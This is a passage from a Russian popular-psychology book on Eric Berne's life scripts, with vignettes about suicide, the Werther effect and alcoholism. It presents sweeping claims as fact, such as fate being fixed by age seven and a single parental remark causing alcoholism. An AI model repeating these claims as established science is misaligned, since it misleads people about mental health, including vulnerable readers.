дан­ном слу­чае нич­тожный. И од­на­ко… В жиз­ни этот че­ловек бу­дет де­лать при­мер­но то же са­мое: из ты­сячи воз­можных ре­шений он вы­берет са­мое не­удач­ное. А на все удач­ные мо­мен­ты жиз­ни, ко­торые ему под­ска­зыва­ет судь­ба, он бу­дет "пле­вать с вы­сокой ко­локоль­ни", и поп­росту не за­мечать их. До­жида­ясь то­го единс­твен­но­го мо­мен­та, ко­торый са­мый пло­хой. До­жида­ясь этой сво­ей ямы… Но кро­ме чет­верто­го есть еще и пя­тый. Мис­ти­ка, но ес­ли от­вести его вбок от ямы, то он все рав­но при­ходит к ней! Тест этот про­водить вам со­вер­шенно не­обя­затель­но, прос­то на его при­мере мы по­пыта­лись лиш­ний раз объ­яс­нить, кто та­кие жер­твы, или вик­ти­мы, как мы ус­ло­вились их на­зывать. Вот и в жиз­ни та­кие лю­ди де­ла­ют то же са­мое. Это лю­ди со скрип­та­ми, они не воль­ны рас­по­ряжать­ся сво­ей жизнью… Са­мое ин­те­рес­ное в на­шей жиз­ни то, что ка­кой она бу­дет мы ре­ша­ем очень ра­но — в воз­расте от 3 до 6 лет. Не­кото­рые, осо­бо ода­рен­ные, еще рань­ше — в пе­ри­од внут­ри­ут­робно­го раз­ви­тия. Э. Берн го­ворил на эту те­му при­мер­но так: "Каж­дый че­ловек в ран­нем детс­тве ре­ша­ет, как он бу­дет жить в жиз­ни, как он ум­рет, и этот план, ко­торый всег­да с ним, где бы он ни был, и на­зыва­ет­ся скрип­том или сце­нари­ем.Его по­веде­ние мо­жет быть обус­ловле­но здра­вым смыс­лом, но все важ­ней­шие ре­шения в его жиз­ни уже при­няты: ко­го он вы­берет в суп­ру­ги, сколь­ко бу­дет де­тей и бу­дут ли они во­об­ще и т. д.". Скрипт — это жиз­ненный план, сфор­ми­рован­ный в ран­нем детс­тве под вли­яни­ем ро­дите­лей. Вот вам и от­вет на воп­рос, кто пи­шет нам скрип­ты. Ро­дите­ли, ко­неч­но, кто же еще… Скрипт — это та пси­холо­гичес­кая си­ла, ко­торая тол­ка­ет че­лове­ка к его судь­бе. Про­читав эти стро­ки, чи­татель мо­жет по­думать, что ав­то­ры уда­рились в глу­бокую фи­лосо­фию, и, на­конец, от­ве­тили на воп­рос, дав­но му­чав­ший все че­лове­чес­тво: "Что на­ша жизнь — пред­ре­шен­ная кем-то судь­ба или мы са­ми стро­ите­ли сво­ей жиз­ни?" А за­од­но и вы­вели фор­му­лу жиз­ни, по ко­торой мы все жи­вем. Увы, не так. Увы, по­тому что это сде­лали не ав­то­ры, а ве­ликие пси­холо­ги и пси­хоте­рапев­ты. И ос­но­вате­лем это­го нап­равле­ния в пси­холо­гии яв­ля­ет­ся уже мно­го раз упо­минав­ший­ся на­ми Э. Берн, а так­же Э. Карп­мпан, М. Лит­вак — эти пси­холо­ги мно­го пот­ру­дились на ни­ве сце­нар­но­го прог­рамми­рова­ния. Они же и от­ве­тили на воп­рос, что нуж­но сде­лать для то­го, что­бы са­мим стать стро­ите­лями сво­ей жиз­ни, да­же ес­ли до это­го мы жи­вем по на­писан­но­му кем-то скрип­ту. Это нап­равле­ние в пси­холо­гии на­зыва­ет­ся сце­нар­ное или скрип­то­вое пе­реп­рограм­ми­рова­ние. От­ве­тили они и на воп­рос, кто пи­шет нам скрип­ты. Ро­дите­ли, как мы уже вы­яс­ни­ли. Че­лове­чес­кую жизнь не нуж­но сво­дить к фор­му­лам, и все пси­холо­ги в один го­лос твер­дят о том, что нор­маль­ная жизнь — это жизнь не по фор­му­ле. Нор­маль­ная жизнь — это ког­да че­ловек сам хо­зя­ин сво­ей судь­бы, ког­да он жи­вет ра­зум­но строя свою жизнь, с уче­том дей­ствий внеш­них об­сто­ятель­ств и жиз­ни дру­гих лю­дей. Од­на­ко боль­шинс­тво лю­дей, увы, жи­вут не­нор­маль­но. Жи­вут по фор­му­ле. По сце­нарию. …Пси­холог си­дит в сво­ем ка­бине­те, хму­ря лоб и изоб­ра­жая муд­ре­ца. Пе­ред ним си­дит роб­кий, на пер­вый взгляд, юно­ша со стоп­кой лис­тков. Юно­ша — это па­ци­ент, а стоп­ка лис­тов это его жиз­не­опи­сание, на­чиная от мо­мен­та "пер­вой па­мяти" и за­кан­чи­вая се­год­няшним днем. Жиз­не­опи­сание пси­хоте­рапевт поп­ро­сил его на­писать на пре­дыду­щей встре­че, поп­ро­сив пи­сать как мож­но под­робнее и сфор­му­лиро­вав воп­ро­сы, на ко­торые в этом опи­сании жиз­ни дол­жны быть да­ны от­ве­ты. Пси­хоте­рапевт про­читал жиз­не­опи­сание до 7 лет, а ос­таль­ное от­ло­жил. — По­чему же вы не чи­та­ете даль­ше, ведь даль­ше са­мое ин­те­рес­ное, — спро­сил юно­ша с не­кото­рым раз­дра­жени­ем. — Да нет, — за­дум­чи­во от­ве­тил пси­хоте­рапевт, — са­мое ин­те­рес­ное уже про­изош­ло, а что у вас бы­ло даль­ше, я вам сам мо­гу рас­ска­зать. Все вер­но. До се­ми лет "дви­жок скрип­та" ("кос­тяк скрип­та") уже был соз­дан. Даль­ше бу­дет лишь его "тю­нинг". Даль­ше ре­бенок бу­дет встре­чать все боль­ше и боль­ше лю­дей, при­чем имен­но тех, ко­торые бу­дут ис­полни­теля­ми ро­лей в его скрип­те. Ес­ли его скрипт — скрипт не­удач­ни­ка, то и встре­чать он бу­дет толь­ко не­удач­ни­ков. Вер­нее, он мо­жет встре­чать и дру­гих лю­дей, очень удач­ли­вых, ему са­мому мо­жет не раз улы­бать­ся уда­ча, но он прой­дет ми­мо и удач­ли­вых лю­дей, и уда­чи. По­тому что в его скрип­те нет для них ро­ли… И да­лее всю свою жизнь че­ловек бу­дет про­иг­ры­вать свой скрипт с уче­том уже но­вых, по­явив­шихся ро­лей. При­меча­ние Смот­рю на по­сети­телей на­шего фо­рума… Есть и ба­лов­ни судь­бы, есть и не­удач­ни­ки, есть и яв­ные ан­ти­соци­аль­ные пси­хопа­ты. Вся­кие есть. Ведь по­сети­тели фо­рума — это срез ре­аль­ной жиз­ни. А вот и со­ци­аль­ный ха­кер с от­ри­цатель­ным ук­ло­ном. Уж и так нас из се­бя пы­та­ет­ся вы­вес­ти и эдак… Не вый­дет, не ста­рай­ся. Мы уже уш­ли от тех сво­их скрип­тов, в ко­торых та­ким лю­дям бы­ло мес­то. Смот­рим на не­го и да­же не злим­ся. На­обо­рот — жа­ле­ем. По­тому что при­мер­но по­нят­но, по­чему он та­кой и по­чему так се­бя ве­дет. Пы­та­ем­ся уга­дать его скрипт. Ско­рее все­го, до­гад­ка бу­дет пра­виль­ной, по­тому что у всех про­вока­торов "дви­жок скрип­та" при­мер­но оди­наков. Наб­лю­да­ем даль­ше. Ан нет. Смот­ри-ка ты, ошиб­лись. Это не про­вока­тор. Вер­нее внеш­не он про­вока­тор, но по су­ти сво­ей внут­ренней — нет. Это че­ловек, ко­торо­му в скрип­те бы­ло за­писа­но, что его все вре­мя бу­дут бить. И все его по­веде­ние вы­зыва­ющее — это не про­вока­торс­тво, это же­лание спро­воци­ровать свое из­би­ение, до­ведя ад­ми­нис­тра­цию фо­рума и не­кото­рых по­сети­телей "до бе­лого ка­ления". Не бу­дем мы те­бя бить, те­бя и так бь­ют все ко­му не по­падя. А вот здесь — стоп. Здесь вни­матель­но: это к нам при­шел раз­ру­шитель. Поч­ти клас­си­чес­кий "скрипт Ге­рос­тра­та". Это­го мо­дери­ровать, мо­дери­ровать и мо­дери­ровать. Да­же то, что он пи­шет "по де­лу". По­тому что нуж­но что­бы он быс­трее ушел с фо­рума, пус­кай в дру­гом мес­те кру­шит и ру­шит… Как жаль, что у нас в во­ору­жен­ных си­лах нет пси­холо­гов, вон сколь­ко ге­нера­лов боль­шез­вез­дных с ге­рос­тра­тов­ски­ми скрип­та­ми толь­ко по те­леви­зору по­казы­ва­ют… Вся цель скрип­то­вого ана­лиза — прев­ра­тить не­удач­ни­ков в удач­ли­вых, вы­яс­нив пред­ва­ритель­но, сог­ласно ка­кого скрип­та они дей­ству­ют. Это и есть сце­нар­ное пе­реп­рограм­ми­рова­ние. Вещь слож­ная и серь­ез­ная. Кто бы спо­рил… Пе­реде­лать судь­бу че­лове­ка — это не мо­жет быть прос­то. Но впол­не воз­можно. При­меров — мно­го. Ес­тес­твен­но, уже по­ложи­тель­ных. При­меча­ние Слож­ность в сце­нар­ном пе­реп­рограм­ми­рова­нии не­ред­ко зак­лю­ча­ет­ся в том, что лю­ди час­то пы­та­ют­ся стать счас­тли­выми сов­сем не для то­го, что­бы им стать по фак­ту, т. е. не для то­го, что­бы быть счас­тли­вым и жить счас­тли­во. А лишь толь­ко для то­го, что­бы стать "бо­лее ус­пешным не­удач­ни­ком". По­тому что ес­ли че­ловек ста­новит­ся счас­тлив­чи­ком, ему при­ходит­ся выб­ро­сить свой скрипт, а боль­шинс­тво лю­дей де­ла­ют это край­не не­охот­но. Ну что ж, пой­дем даль­ше, — по­сидим на при­еме у пси­хоте­рапев­та и пос­мотрим, ка­кие скрип­ты бы­ва­ют. Вот за­шел груз­ный уса­тый дя­день­ка. Жа­лу­ет­ся на то, что ни­чего не ус­пе­ва­ет… Хоть и на ма­шине вез­де ез­дит, а все рав­но ни­чего не ус­пе­ва­ет. На ма­шине? Это ин­те­рес­но. — А у вас час­то бы­ва­ет так, что бен­зин вдруг за­кан­чи­ва­ет­ся за 10 мет­ров до зап­равки, и вам ма­шину тол­кать при­ходит­ся с по­мощью всех, кто в ней на ва­ше счастье ока­зал­ся? — спра­шива­ет пси­холог. — Да поч­ти каж­дый раз та­кое… А от­ку­да вы это уз­на­ли? А от­ту­да, что вы не пер­вый. Не у вас од­но­го за 10 мет­ров до зап­равки кон­ча­ет­ся бен­зин, хо­тя ес­ли не сло­ман ука­затель топ­ли­ва в ма­шине, то о том, что бен­зин ско­ро мо­жет кон­чить­ся из­вес­тно всег­да за­ранее. Мы же смот­рим на этот ука­затель, пла­ниру­ем "чуть поз­же" за­ехать на зап­равку и, как всег­да, не за­ез­жа­ем, от­ло­жив на по­том. А по­том тол­ка­ем ма­шину, по­тому что бен­зин по­чему-то "вдруг вне­зап­но" за­кон­чился. И в жиз­ни у та­ких лю­дей все точ­но так же. А ис­то­рия с бен­зи­ном — это все­го лишь ря­довая сце­на в пь­есе, ко­торую иг­ра­ет не­удач­ник. При­меча­ние Это один из ря­да воп­ро­сов, ко­торые в серь­ез­ных фир­мах за­да­ют ус­тра­ива­ющим­ся на ра­боту. Час­то ли у вас за­кан­чи­ва­ет­ся бен­зин за 10 мет­ров до зап­равки? Час­то? Из­ви­ните, вы нам не под­хо­дите. А вот еще де­вуш­ка. Ми­ловид­ная та­кая, но уже с ка­кой-то фан­томной пе­чатью на ли­це. Так оно и есть. Де­вуш­ка ре­шила со­вер­шить са­мо­убий­ство. Толь­ко скрипт, вид­но, "дал сбой", и она приш­ла к пси­хоте­рапев­ту. Бы­ва­ет та­кое со скрип­та­ми, не­доп­рограм­ми­ровал где-то прог­раммист… Де­вуш­ка рас­ска­зыва­ет, что "как-то вдруг по­чувс­тво­вала неп­ре­одо­лимую тя­гу к са­мо­убий­ству". Не как-то и не вдруг, ко­неч­но… На­вер­ня­ка в семье уже бы­ли са­мо­убий­цы, и на­вер­ня­ка все ее вос­пи­тание в дет­ские го­ды ве­лось по прин­ци­пу "Жизнь — об­ман с ча­ру­ющей тос­кою". (Это у Есе­нина та­кие стро­ки есть.) А вот по­чему вдруг де­вуш­ка по­чувс­тво­вала это стрем­ле­ние сей­час — это воп­рос, в ко­тором сто­ит ра­зоб­рать­ся. Мо­жет быть, ее отец по­кон­чил жизнь са­мо­убий­ством в том воз­расте, в ко­тором она сей­час? Нет, на­вер­ное, все чуть-чуть не так. В дан­ном слу­чае ви­новат так на­зыва­емый эф­фект Вер­те­ра. Вер­тер — это глав­ный ге­рой ро­мана Ге­те "Стра­дания юно­го Вер­те­ра", ко­торый в ро­мане за­кан­чи­ва­ет жизнь са­мо­убий­ством. Ро­ман этот прос­ла­вил­ся сре­ди про­чего и тем, что пос­ле его вы­хода в Ев­ро­пе слу­чилась мас­со­вая вол­на под­ра­жатель­ных са­мо­убий­ств (в кни­ге те­ма са­мо­убий­ства — цен­траль­ная). В ря­де стран да­же зап­ре­тили пуб­ли­кацию это­го ро­мана. Очень мно­го изу­чал эф­фект Вер­те­ра аме­рикан­ский пси­холог Д. Фи­липс, ко­торый при­шел к пот­ря­са­ющим вы­водам. Ана­лизи­руя ста­тис­ти­ку са­мо­убий­ств, Фи­липс при­шел к вы­воду, что пос­ле пуб­ли­каций в га­зетах ис­то­рий о са­мо­убий­ствах ко­личес­тво са­мо­убий­ств воз­раста­ло. При­чем имен­но в тех ре­ги­онах, где выш­ла пуб­ли­кация. Ин­те­рес­ная и дра­мати­чес­кая вещь. Уче­ный из это­го сде­лал вы­вод, что это ско­пиро­ван­ные са­мо­убий­ства, т. е. лю­ди, про­читав за­мет­ку в га­зете, при­ходи­ли к вы­водам о том, что для них ана­логич­ный путь — са­мый луч­ший. При­меча­ние Ко­неч­но, за­мет­ка в га­зете это лишь тол­чок к раз­вязке скрип­та. Ре­аль­но же все бы­ло зап­рограм­ми­рова­но за­ранее. "Ро­ковые пись­ме­на" уже на­писа­ны, ес­ли вы­ражать­ся стро­кой из то­го же сти­хот­во­рения Есе­нина. Фи­липс, кро­ме то­го, вы­яс­нил, что пос­ле по­доб­ных пуб­ли­каций воз­раста­ло так­же чис­ло по­гиб­ших в авиа- и ав­то­катас­тро­фах! Мис­ти­ка, ка­залось бы? Нет, это объ­яс­ня­ет­ся тем, что не­кото­рые лю­ди со­вер­ша­ют "за­мас­ки­рован­ное са­мо­убий­ство". Из­вес­тно, что цер­ковь и мно­гие лю­ди осуж­да­ют са­мо­убий­ство. По­это­му, из­бавляя семью от это­го яр­лы­ка, мно­гие со­вер­ша­ют са­мо­убий­ство так: едя на ма­шине на­жима­ют газ там, где нуж­но жать тор­моз. То же са­мое де­ла­ют и пи­лоты не­кото­рых са­моле­тов: "штур­вал вниз" и — вер­ная смерть. Это — на­уч­ные дан­ные. Ко­личес­тво ава­рий пос­ле пуб­ли­каций о са­мо­убий­ствах рез­ко воз­раста­ет. Бо­лее то­го, ес­ли, к при­меру, в га­зете, со­об­ща­ли о са­мо­убий­стве мо­лодо­го че­лове­ка, то в дан­ном ре­ги­оне уве­личи­валось чис­ло ав­то­катас­троф, учас­тни­ками ко­торых бы­ли имен­но мо­лодые лю­ди. Те­перь вый­дем на не­кото­рое вре­мя из ка­бине­та пси­холо­га и об­ра­тим­ся к те­ории. Скрип­ты в че­лове­чес­кой судь­беСна­чала слож­но по­верить в то, что вся судь­ба че­лове­ка, все пос­тупки, ко­торые он со­вер­ша­ет в жиз­ни, бу­дет он ге­ро­ем или по­дон­ком, все это ре­ша­ет­ся ре­бен­ком в воз­расте не стар­ше 7 лет. Од­на­ко в это уже лег­че ве­рит­ся пос­ле об­ще­ния с трех­летни­ми и се­милет­ни­ми деть­ми, а так­же пос­ле то­го, как пос­мотришь на всю на­шу жизнь. При­чем са­мое опас­ное, ког­да лю­ди, "иг­рая свой скрипт", яв­ля­ют­ся по­лити­чес­ки­ми де­яте­лями и име­ют боль­шое вли­яние на об­щес­тво, ко­торое убеж­да­ют в том, что на­до жить так, как они го­ворят. Или, с точ­ки зре­ния скрип­то­вого ана­лиза, нуж­но жить так, как им ког­да-то при­каза­ли жить их ро­дите­ли. К счастью для нас, кро­ме та­ких лю­дей есть лю­ди с хо­роши­ми скрип­та­ми, и есть те, кто су­мел ос­во­бодить­ся от сво­их пло­хих скрип­тов и при­об­рел пра­ва жить по-сво­ему. Та­ким об­ра­зом, скрипт — это то, что че­ловек сам для се­бя зап­ла­ниро­вал в ран­нем детс­тве, в боль­шинс­тве слу­ча­ев, при по­мощи сво­их ро­дите­лей. Мы уже го­вори­ли о том, что ро­дитель­ские скрип­ты — са­мые силь­ные. По мне­нию Бер­на это про­ис­хо­дит по­тому, что ро­дите­ли пред­став­ля­ют­ся ре­бен­ку в ви­де эта­ких ве­лика­нов, на­делен­ных ка­кой-то ма­гичес­кой си­лой. В это нес­ложно по­верить, учи­тывая то, что ро­дите­ли в нес­коль­ко раз вы­ше, в нес­коль­ко раз ши­ре сво­его ре­бен­ка и со­вер­ша­ют вол­шебные, с его точ­ки зре­ния, дей­ствия. Вер­немся в ка­бинет пси­холо­га. Стар­шеклас­сник. При­вела мать. Проб­ле­ма — силь­но пь­ет. Скрипт? Не ис­клю­чено. Даль­ней­шие расс­про­сы по­каза­ли, что дей­стви­тель­но скрипт, и на "питье" он уже был зап­рограм­ми­рован с пя­тилет­не­го воз­раста. И зап­рограм­ми­рован не кем иным, как сво­ей ма­терью. Что же тог­да про­изош­ло? А про­изош­ла сце­на, ко­торая из ра­за в раз пов­то­ря­ет­ся в семь­ях ал­ко­голи­ков. Мать заш­ла и зас­та­ла ре­бен­ка за тем, что он рас­смат­ри­вал бу­тыл­ку вод­ки, ко­торая ос­та­лась от не­дав­не­го зас­толья. — Что ты де­ла­ешь, — зак­ри­чала она, — те­бе еще ра­но пить. Это мо­гут де­лать толь­ко взрос­лые муж­чи­ны! А он не де­лал ни­чего осо­бен­но­го. Прос­то рас­смат­ри­вал бу­тыл­ку. Прос­то из дет­ско­го лю­бопытс­тва. А ма­ма его сво­ими фра­зами зап­рограм­ми­рова­ла на даль­ней­шее питье. Вот и по­лучи­лось, как по ее рас­ска­зу: "до 15 лет был при­мер­ным, ни ра­зу не вы­пивал, а по­том как сор­вался". Да не сор­вался он. Прос­то ре­шил, что уже нас­та­ло вре­мя, ког­да мож­но, т. е. ког­да уже не ра­но. Ведь фра­зой "Те­бе еще ра­но пить" мать под­созна­нию ре­бен­ка ска­зала не что иное, как "при­дет вре­мя, и пить те­бе бу­дет мож­но". Бо­лее то­го, вто­рой фра­зой "это мо­гут де­лать толь­ко взрос­лые муж­чи­ны" в под­созна­ние ре­бен­ка бы­ла вло­жена ус­та­нов­ка, что "ког­да ты ста­нешь взрос­лым муж­чи­ной, пить те­бе бу­дет мож­но". Что из это­го сле­ду­ет? Пра­виль­но. Что кри­терий взрос­лости муж­чи­ны — это тот мо­мент, ког­да он смо­жет на­чать пить. Зна­чит, для то­го что­бы стать Взрос­лым муж­чи­ной, нуж­но на­чать пить. Вот ис­ток ал­ко­голиз­ма в дан­ном кон­крет­ном слу­чае. Сно­ва вер­немся к те­ории. Анек­дот в те­му Все ду­мали, что из-за то­го, что маль­чик Во­ва ро­дил­ся в до­ме ря­дом с вин­но-во­доч­ным ма­гази­ном, его судь­ба бы­ла пред­ре­шена! Но нет! Он вы­рос, окон­чил шко­лу с зо­лотой ме­далью, ин­сти­тут с крас­ным дип­ло­мом, по­том ус­тро­ил­ся на ме­бель­ную фаб­ри­ку и там спил­ся. Па­рамет­ры ха­рак­те­ра или фор­му­ла уда­чиБерн пред­ло­жил опи­сывать ха­рак­тер че­лове­ка по трем па­рамет­рам: • Я (от­но­шение к се­бе); • ВЫ (от­но­шение к близ­ким); • ОНИ (от­но­шение к лю­дям). Из­вес­тный рос­сий­ский пси­хоте­рапевт М. Лит­вак до­бавил к этим трем па­рамет­рам еще один — ТРУД (от­но­шение к пред­метной де­ятель­нос­ти). В каж­дой из этих по­зиций у кон­крет­но­го че­лове­ка мо­жет быть знак "+" или "-". Рас­смот­рим эти по­зиции под­робнее. • Я+ Та­кой че­ловек вос­при­нима­ет се­бя как бла­гопо­луч­ную лич­ность и ве­дет се­бя как бла­гопо­луч­ная лич­ность. • Я- Этот че­ловек вос­при­нима­ет се­бя как неб­ла­гопо­луч­ную лич­ность, как не­удач­ни­ка. Да­же ес­ли у не­го и слу­ча­ют­ся ус­пе­хи, то он их счи­та­ет слу­чай­ны­ми. И да­же в мо­мен­ты ус­пе­ха его не по­кида­ет чувс­тво не­уве­рен­ности, чувс­тво неп­рочнос­ти это­го ус­пе­ха. Все не­уда­чи же вос­при­нима­ют­ся им как со­вер­шенно за­коно­мер­ное яв­ле­ние. Та­кой че­ловек — ди­тя жиз­ненных об­сто­ятель­ств. Как пра­вило, у та­ких лю­дей чрез­мерно вы­сокий уро­вень при­тяза­ний. Это за­коно­мер­ность: чем вы­ше у че­лове­ка уро­вень при­тяза­ний, тем ни­же его са­мо­оцен­ка, и да­же при на­личии ре­аль­ных ус­пе­хов он бу­дет чувс­тво­вать се­бя нес­час­тным (по­тому что уро­вень при­тяза­ний слиш­ком за­вышен). В этом, кста­ти, ко­рень боль­шинс­тва нев­ро­зов. • ВЫ+ При­меча­ние Из­вес­тно, что ес­ли че­лове­ка, ко­торый счи­та­ет се­бя бед­ным, озо­лотить с ног до го­ловы, то он не ста­нет от это­го бо­гатым. По­тому что все рав­но бу­дет счи­тать се­бя бед­ным, да­же ес­ли бу­дет хо­дить в рас­ши­тых зо­лотом одеж­дах. Ему все вре­мя бу­дет че­го-то не хва­тать: есть одеж­да, — бу­дет не хва­тать ма­шины, есть ма­шина — са­моле­та и т. д. С дру­гой же сто­роны, че­ловек, ко­торый счи­та­ет се­бя бо­гатым, не бу­дет выг­ля­деть бед­ным, да­же ес­ли вне­зап­но ос­та­нет­ся без средств к су­щес­тво­ванию. Для не­го это бу­дет не бед­ность, а "вре­мен­ные фи­нан­со­вые труд­ности". Че­ловек со зна­ком плюс в по­зиции ВЫ счи­та­ет близ­ких лю­дей бла­гопо­луч­ны­ми людь­ми и в раз­го­ворах с ни­ми вер­баль­но и не­вер­баль­но об­ра­ща­ет­ся толь­ко к их по­ложи­тель­ным ка­чес­твам. Та­кой че­ловек дру­желю­бен, пред­по­чита­ет ком­про­мис­сы ссо­ре. К не­дос­таткам сво­их пар­тне­ров по об­ще­нию (ко­торые он прек­расно ви­дит) он от­но­сит­ся как к ши­пам у ро­зы: нас­лажда­ет­ся за­пахом ро­зы, при этом ста­ра­ясь не нат­кнуть­ся на ши­пы. • ВЫ- Та­кой че­ловек рас­смат­ри­ва­ет лю­дей сво­его близ­ко­го ок­ру­жения как неб­ла­гопо­луч­ных и из­на­чаль­но нас­тро­ен на кон­фликт с ни­ми. В лю­дях он ви­дит толь­ко не­дос­татки. В ана­логии с ши­пами у ро­зы, он все вре­мя на­тыка­ет­ся толь­ко на ши­пы, не чувс­твуя при этом, что у ро­зы кро­ме ши­пов мо­жет быть еще прек­расный за­пах. Та­кие лю­ди при­дир­чи­вы, стре­мят­ся пе­ревос­пи­тать дру­гих, из­лишне сар­кастич­ны. Они го­товы да­же по нез­на­читель­но­му по­воду за­те­ять боль­шую ссо­ру с даль­ней­шим раз­ры­вом от­но­шений. Без­бо­лез­ненно со­сущес­тво­вать ря­дом с та­кими людь­ми мож­но толь­ко пос­то­ян­но, и во всем им ус­ту­пая. • ОНИ+ Лич­ность с плю­сом в по­зиции ОНИ рас­по­ложе­на к лю­дям, лег­ко за­водит но­вые кон­такты. • ОНИ- В этом слу­чае на­обо­рот: че­ловек стре­мит­ся из­бе­гать но­вых кон­тактов, при воз­никно­вении но­вых зна­комств зас­тенчив и не­уве­рен. Очень мед­ленно адап­ти­ру­ет­ся к но­вой об­ста­нов­ке. • ТРУД+ Та­кой че­ловек жи­во от­но­сит­ся к сво­ей де­ятель­нос­ти, пос­то­ян­но са­мосо­вер­шенс­тву­ет­ся, ему нра­вит­ся сам про­цесс тру­да, он хо­чет внес­ти свой твор­ческий вклад в то, что он де­ла­ет. Важ­но то, что про­цесс тру­да для та­кого че­лове­ка — пер­ви­чен. Ма­тери­аль­ные цен­ности, наг­ра­ды и про­чие бла­га от­хо­дят на вто­рой план, при этом са­мое ин­те­рес­ное, лю­ди с по­зици­ей ТРУД+ поч­ти всег­да их по­луча­ют, не в при­мер тем, у ко­го ма­тери­аль­ные цен­ности на пер­вом мес­те. • ТРУД- У та­кой лич­ности про­цесс тру­да — вто­ричен. На пер­вое мес­то вы­ходят те ма­тери­аль­ные бла­га, ко­торые лич­ность мо­жет по­лучить в про­цес­се сво­его тру­да. Та­кой сот­рудник, к при­меру, пос­то­ян­но ищет бо­лее вы­год­ную ра­боту, и все вре­мя смот­рит как бы его толь­ко не об­де­лили при рас­пре­деле­нии ма­тери­аль­ных благ. Та­ким об­ра­зом, мы при­ходим к вы­воду, что струк­ту­ра ха­рак­те­ра гар­мо­нич­ной лич­ности оп­ре­деля­ет­ся сле­ду­ющей фор­му­лой, и не бу­дет боль­шой на­тяж­кой, ес­ли эту фор­му­лу мы на­зовем фор­му­лой уда­чи: При­меча­ние Это очень слож­но бы­ва­ет объ­яс­нить… что ма­тери­аль­ные бла­га — воп­рос вто­рич­ный. Не­ред­ко все соз­на­ние че­лове­ка про­тивит­ся это­му по­ложе­нию. По­сыла­ешь че­лове­ка на уче­бу, а он ма­ло то­го, что ехать не осо­бо хо­чет (ка­залось бы, са­мосо­вер­шенс­тво­вание за счет фир­мы!), так еще и спра­шива­ет, сколь­ко ему за это доп­ла­тят к ос­новной зар­пла­те. Или дру­гой при­мер. Го­воришь сот­рудни­ку: нуж­но вот это ос­во­ить. "Ос­вою, — от­ве­ча­ет, — ес­ли мне доп­ла­тят вот столь­ко-то". Яс­но, что та­кие лю­ди ни­ког­да не ста­нут бо­гаты­ми, в том чис­ле и в ма­тери­аль­ном пла­не, нес­мотря на то, что са­ми это­го страс­тно же­ла­ют. Не ста­нут по од­ной прос­той при­чине. Ес­ли ис­клю­чить все про­чие спо­собы на­живы, по­лучать хо­рошие день­ги за свой труд мо­жет толь­ко спе­ци­алист экс­тра-клас­са. А для то­го, что­бы стать та­ким спе­ци­алис­том, нуж­но со­вер­шенс­тво­вать­ся каж­дый день, без от­гу­лов и вы­ход­ных. А для то­го, что­бы так пос­ту­пать, нуж­но очень лю­бить свое де­ло. Силь­нее, чем день­ги. Ес­ли бы мы, ког­да пи­сали кни­гу, все вре­мя мыс­ленно каль­ку­лиро­вали в уме, сколь­ко же мы за нее по­лучим го­нора­ров, то мы бы ее ли­бо во­об­ще не на­писа­ли, ли­бо на­писа­ли так, что она бы­ла бы а­ут­сай­де­ром рей­тин­гов про­даж. Мы не зна­ем, и не ра­зу не ви­дели ни од­но­го пи­сате­ля, в том чис­ле и с мил­ли­он­ны­ми го­нора­рами на сче­тах, ко­торый бы стал зна­мени­тым, ес­ли бы пи­сал свои кни­ги толь­ко с целью по­луче­ния го­нора­ров. В пер­вую оче­редь пи­шет­ся для де­ла и ра­ди де­ла. Пи­шут, по­тому что не мо­гут не пи­сать. А по­том уже при­ходит и сла­ва, и го­нора­ры, и наг­ра­ды. По­тому что все это при­ходит толь­ко в наг­ра­ду за хо­рошо сде­лан­ное де­ло. А хо­рошо сде­лать де­ло мож­но толь­ко в том слу­чае, ес­ли де­ла­ешь его толь­ко ра­ди де­ла. За­то все мы ви­дели на­шу сбор­ную по фут­бо­лу. А­ут­сай­дер­скую. Фут­бо­лис­ты ко­торой, яв­ля­ясь ле­ги­оне­рами раз­личных за­рубеж­ных клу­бов, иг­ра­ют в сбор­ной в пер­вую оче­редь не за иг­ру, а толь­ко за день­ги. Все ви­дели, как они иг­ра­ют. Да­же для че­лове­ка, не раз­би­ра­юще­гося в фут­бо­ле, это по­зори­ще, а не иг­ра. Так­же мы ви­дели мно­го сот­рудни­ков, ко­торые из ко­жи ле­зут, что­бы стать бо­гатым, дей­ствуя при этом по прин­ци­пу: "я бу­ду де­лать толь­ко то де­ло, ко­торое при­несет мне боль­шой и, же­латель­но, не­мед­ленный, до­ход". Это все рав­но, что пи­сатель ска­зал бы: "Я бу­ду пи­сать толь­ко ту кни­гу, за ко­торую мне да­дут Но­белев­скую пре­мию в об­ласти ли­тера­туры". Яс­но, что бо­гатс­тво — это не их удел. Я+, ВЫ+, ОНИ+, ТРУД + За­дача сце­нар­но­го пе­реп­рограм­ми­рова­ния — при­вес­ти струк­ту­ру лич­ности к это­му иде­алу. Са­мое ин­те­рес­ное, что поч­ти каж­дый из нас уже был об­ла­дате­лем ха­рак­те­ра, под­чи­ня­юще­гося этой счас­тли­вой фор­му­ле. Да, да, в том са­мом детс­тве. По­ка боль­шинс­тво из нас еще не ус­пе­ли ис­портить вос­пи­тани­ем, не ус­пе­ли вог­нать в сце­нарий, от ко­торо­го ко­му-то приш­лось из­бавлять­ся собс­твен­ны­ми уси­ли­ями, под­час ти­тани­чес­ки­ми, ко­му-то с по­мощью пси­хоте­рапев­та, а кто-то так и не су­мел или не ус­пел выс­ко­чить из сце­нария… Ведь вспом­ним се­бя в са­мом ран­нем детс­тве. А те, у ко­го не по­лучит­ся вспом­нить, пос­мотри­те на де­тей воз­раста от го­да до трех. Как он к се­бе от­но­сит­ся? Да рас­чу­дес­но! (Я+). А как он от­но­сит­ся к сво­им ро­дите­лям? Прек­расно! (ВЫ+). А к друзь­ям? Пос­мотри­те на ма­лень­ких де­тей: как быс­тро и лег­ко они за­водят се­бе но­вые зна­комс­тва. Яс­но, что здесь ОНИ+. У этих де­тей еще нет ни­каких ус­ловнос­тей, нет со­ци­аль­ных барь­еров, нет де­ления на кас­ты… Ус­ловнос­ти и барь­еры нач­нут фор­ми­ровать­ся чуть поз­же… "А вот мой па­па — ка­питан, а твой — двор­ник, по­это­му ты не бу­дешь иг­рать в на­шей пе­соч­ни­це, иди вон ту­да, в ту, ко­торая по­хуже, в ко­торой пе­сок пог­рязнее". Все — пош­ло де­ление на кас­ты. И пош­ло фор­ми­рова­ние ми­нуса в по­зиции ОНИ. А те­перь ска­жите мне, от­ку­да ре­бенок смог уз­нать, что па­па-ка­питан это хо­рошо, а па­па-двор­ник — пло­хо? Пра­виль­но, от ро­дите­лей… По­том, мно­го поз­же, ког­да, про­жив мно­го лет в сце­нарии, он вдруг пой­мет, что ему всю жизнь ме­шало то, что он об­щался не с те­ми, с кем хо­чет­ся, а с 